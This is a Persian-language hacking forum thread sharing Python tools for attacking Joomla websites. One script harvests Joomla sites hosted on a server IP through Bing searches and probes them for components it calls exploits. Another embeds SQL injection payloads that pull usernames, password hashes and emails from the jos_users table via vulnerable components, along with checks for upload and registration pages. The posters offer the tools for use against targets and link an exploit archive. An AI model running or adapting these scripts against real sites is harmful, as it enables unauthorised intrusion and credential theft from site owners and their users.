SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

joomla scanner python

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • joomla scanner python

    سلام بچه ها 
    واستون یه برنامه پایتون دارم که با این برنامه میتونیین سایت های جوملای روی سرورو بررسی کنین. تازه کامپوننت های هر سایت جوملا رو هم بتون میده
    به نظرم چیز بدرد بخوریه
    [img]images/smilies/Smileys/10.gif[/img]

    http://cld.persiangig.com/download/VwgfJgQwes/joomla_scanner.py/dl

  • #2
    RE: joomla scanner python

    سورس ها رو اینطوری قرار بدین بهتره بین دوتگ [ code ] و  [ /code ]
    کد:
    #!/usr/bin/python
    
    # Joomla Scanner
    #  >>>>>>>>> WHT <<<<<<<<<<
    # Coded by Web Hacking Tutorials | www.webhackingtutorials.com
    
    '''
    this is a simple tool that grabs
    websites that are using joomla
    cms on the server and checks most
    common  components that may be vulnerable
    '''
    
    import re , urllib2 , sys , os
    from platform import system
    
    if system() == 'Linux':
        os.system('clear')
    if system() == 'Windows':
        os.system('cls')
    
    logo = '''
    
           ____  ___    
          / /  |/  /____   | ----| Joomla Scanner |----
     __  / / /|_/ / ___/   | Author : Web Hacking Tutorials
    / /_/ / /  / (__  )    | FB : https://www.facebook.com/WebHackingTutorials
    \____/_/  /_/____/     | Site : www.webhackingtutorials.com
                        
    
    '''
    
    # found this code on stackoverflow.com/questions/19278877
    def unique(seq):
        seen = set()
        return [seen.add(x) or x for x in seq if x not in seen]
    
    print(logo)
    
    def jmgrabber(s):
        lista = []
        page = 1
        print('\n')
        while page <= 21:
            bing = "http://www.bing.com/search?q=ip%3A"+s+"+index.php?option=com&count=50&first="+str(page)
            openbing  = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
            for i in range(len(findwebs)):
                jmnoclean = findwebs[i]
                findjm = re.findall('(.*?)index.php', jmnoclean)
                lista.extend(findjm)
    
            page = page + 10
    
        final =  unique(lista)
        for jm in final:
            print '\n'
            print '[*] Target : %s' % jm
            jm = str(jm)
            jmscanner(jm)
            
    
    def jmscanner(site):
        exploits = {
        'com_jdownloads' : 'index.php?option=com_jdownloads&Itemid=97&view=upload' ,
        'com_content' : 'index.php?option=com_content&Itemid=97' ,
        'com_jce' : 'index.php?option=com_jce&Itemid=97' ,
        'com_media' : 'index.php?option=com_media&Itemid=97'
        }
        for key , val in exploits.items():
            try:
                ss = urllib2.urlopen(site+val).getcode()
                if ss == 200:
                    print "\tFound ---> " + key
            except :
                pass
    
        
    try:
        ip = sys.argv[1]
        jmgrabber(ip)
    
    except:
        print '[*] Usage : python '+sys.argv[0]+' 127.0.0.1'
        pass
    [align=center]IRH WebScanner Tools V.1
    |90%//////////////////////////////////////////|

    [/align]

    نظر


    • #3
      RE: joomla scanner python

      #!/usr/bin/python

      # c0dEd By M.tucX



      import sys,urllib2,time,httplib



      mtucx = 5

      dzx = 4



      print "C0ded By M.tucX"

      print "Gr3etZ to : Mad Guko - Mr DZ...."

      print "pyhthon joom.py www.target.com"



      BAD_RESP = [400,401,404]



      def main(path):

          print "Scan:",host.split("/",1)[1]+path

          try:

              h = httplib.HTTP(host.split("/",1)[0])

              h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)

              h.putheader("Host", host.split("/",1)[0])

              h.endheaders()

              resp, reason, headers = h.getreply()

              return resp, reason, headers.get("Server")

          except(), msg: 

              print "Error Occurred:",msg

              pass



      def timer():

          now = time.localtime(time.time())

          return time.asctime(now)



      dzx = { "index.php?option=com_idoblog&task=profile&Itemid= 1337&userid=62+union+select+1,2,concat%28username, 0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,1 3,14,15,16+from+jos_users--" : ["com_idoblog"], "index.php?option=com_ignitegallery&task=view&gall ery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0 x3a,username,0x3a,email,0x3a,password,0x3a,usertyp e),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery"], "index.php?option=com_media&view=images&tmpl=compo nent&fieldid=&e_name=jform_articletext&asset=com_c ontent&author=&folder=" : ["com_media"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic"], "index.php?option=com_users&view=registration" : ["com_user"], "index.php?option=com_jce" : ["JCE","link"], "index.php?option=com_user&view=reset&layout=confi rm" : ["com_user"], "index.php?option=com_smartformer":["com_smartformer"],"index.php?option=com_garyscookbook&func=newItem" :["com_garyscookbook"],"index.php/component/osproperty/?task=agent_register":["com_osproperty"]}



      if len(sys.argv) != 2:

          sys.exit(1)



      host = sys.argv[1].replace("http://","").rsplit("/",1)[0]

      if host[-1] != "/":

          host = host+"/"

          

      print "\nTarget:",host

      print "\nScanning Exploit\n"

      for xpl,(poc) in dzx.items():

          resp,reason,server = main(xpl)

          if resp not in BAD_RESP:

              print ""

              print "\nResult:",resp, reason

              print "\nVuln",poc

          else:

              print ""

              print "\nResult:",resp, reason

              print 

      print "\nEnd\n
      دوستان  لینک  سایت  منبع  بزارید  
      تا  جدید  بودن  اشکار بشه  
      این  از من  
      http://www.exploit4arab.net/exploits/924
      سلامتی اونی که حرمت نون و نمک حالیشه ... سلامتی رفیقی حکمه رفاقتشو با جوهر معرفت امضا میکنن نه با جوهر خیانت ...سلامتی رفیقی که شریکه روزهای تنگه .. نه رفیقی که فقط تو روزهای قشنگه
       

      نظر

      صبر کنید ..
      X